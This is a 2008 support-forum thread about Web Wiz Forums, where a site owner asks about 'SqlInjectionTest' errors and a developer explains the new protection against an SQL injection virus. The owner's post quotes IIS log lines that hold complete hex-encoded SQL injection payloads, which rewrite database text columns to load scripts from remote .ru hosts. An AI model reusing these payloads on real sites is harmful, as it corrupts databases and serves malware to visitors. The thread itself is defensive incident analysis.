Web Wiz - Green Windows Web Hosting
Web Wiz Homepage Search Web Wiz

  New Posts New Posts RSS Feed - SqlInjectionTest
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

SqlInjectionTest
 Post Reply Post Reply
Author
  Topic Search Topic Search  Topic Options Topic Options
Nick-V View Drop Down
Senior Member
Senior Member


Joined: 26 October 2002
Location: United Kingdom
Status: Offline
Points: 319 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Nick-V Quote  Post ReplyReply Direct Link To This Post Topic: SqlInjectionTest
    Posted: 30 August 2008 at 11:30am
I've just installed 9.51 with all logging enabled. I note the following:
 
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
 
  1. I really welcome additional security but would like to know what is happening here? A guest cannot post so cannot inject? What is this test telling me?
  2. Why are we seeing an internal IP address 192.168.xxx.xxx?
Back to Top
Nick-V View Drop Down
Senior Member
Senior Member


Joined: 26 October 2002
Location: United Kingdom
Status: Offline
Points: 319 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Nick-V Quote  Post ReplyReply Direct Link To This Post Posted: 30 August 2008 at 12:14pm
I am checking the forum log and the IIS log to try and determine exactly what is happening with some SQL injections and have provided info below that may be useful. My questions:
 
1) Does printer_friendly_posts.asp (and others) need to be protected...there was an attempt in the IIS log but nothing in the forum log?
 
2) Why do the two apparent attacks in the IIS log from 196.44.128.221 have an IP address in the forum log of 192.168.1 .196?
 
4 x SQL forum log entries (printer_friendly_posts.asp is missing)
2008-08-29 17:57:07 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_Server_SqlInjectionTest() -  -
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 19:06:51 - 189.20.218.142 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 23:06:27 - 200.96.213.185 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
5 x IIS log entries
2008-08-29 16:57:08 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:00:05 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:57:30 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/printer_friendly_posts.asp TID=8163;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E326232342E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 67.233.178.228 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 302 0 0 799 1456 234
 
2008-08-29 18:06:52 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E767377632E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 189.20.218.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1445 578
 
2008-08-29 22:06:26 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474
Back to Top
WebWiz-Bruce View Drop Down
Admin Group
Admin Group
Avatar
Web Wiz Developer

Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844 		Post Options Post Options   Thanks (0) Thanks(0)   Quote WebWiz-Bruce Quote  Post ReplyReply Direct Link To This Post Posted: 31 August 2008 at 8:36am
The SQL Injection test has been put in place mainly to reduce the impact of the current SQL Injection Virus which are very common at present.

Web Wiz Forums is already protected against SQL Injection. Any input used within an SQL Query is screened and any SQL removed. However attacks by these viruses do NOT course security issues in Web Wiz Forums thanks to the screening but the page will still load as normal using up bandwidth and server resources.

This test is run right at the beginning and just returns an error message, thus reducing your bandwidth consumption and server load when these viruses attack.

On some busy forums have seen as many as 40 attempts per second by these viruses attempting to inject malicious SQL into the forum, so having this extra precaution is useful for these forums to reduce the amount of resources consumed unnecessary by these virus attacks.

The IIS log file entries that you have included at the end of your post are from computers infected with an SQL Injection virus that attempted to inject malicious SQL into your forum.

To determine which pages are best protected and in what way have studied the log files of a number of large forums that come under regular attack from these viruses. The printer_friendly_posts.asp page does have this extra protection so make sure you have updated it to the latest release.

IP addresses maybe different in IIS log files to Web Wiz Forums as IIS stores the IP of proxy servers which can mean the IP is not always correct. Web Wiz Forums being written in ASP has to relie on the IP address contained in the HTTP header, which maybe altered to give an incorrect IP address.


Edited by WebWiz-Bruce - 31 August 2008 at 10:57am
Web Wiz Forums Hosting
ASP.NET Web Hosting
Back to Top
Nick-V View Drop Down
Senior Member
Senior Member


Joined: 26 October 2002
Location: United Kingdom
Status: Offline
Points: 319 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Nick-V Quote  Post ReplyReply Direct Link To This Post Posted: 31 August 2008 at 11:16am
Thanks for all the useful explanations about this new feature...
 
I replaced ALL files when I set up this version but I'll check the version of printer_friendly_posts.asp again - more likely the error predates the upgrade !
 
EDIT: I definately have the correct version installed and the log timestamps show that that everything was in place...I will monitor this.


Edited by Nick-V - 31 August 2008 at 11:32am
Back to Top
 Post Reply Post Reply

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.08
Copyright ©2001-2026 Web Wiz Ltd.

Become a Fan on Facebook Follow us on X Connect with us on LinkedIn Web Wiz Blogs
About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.

Copyright ©2001-2026 Web Wiz Ltd. All rights reserved.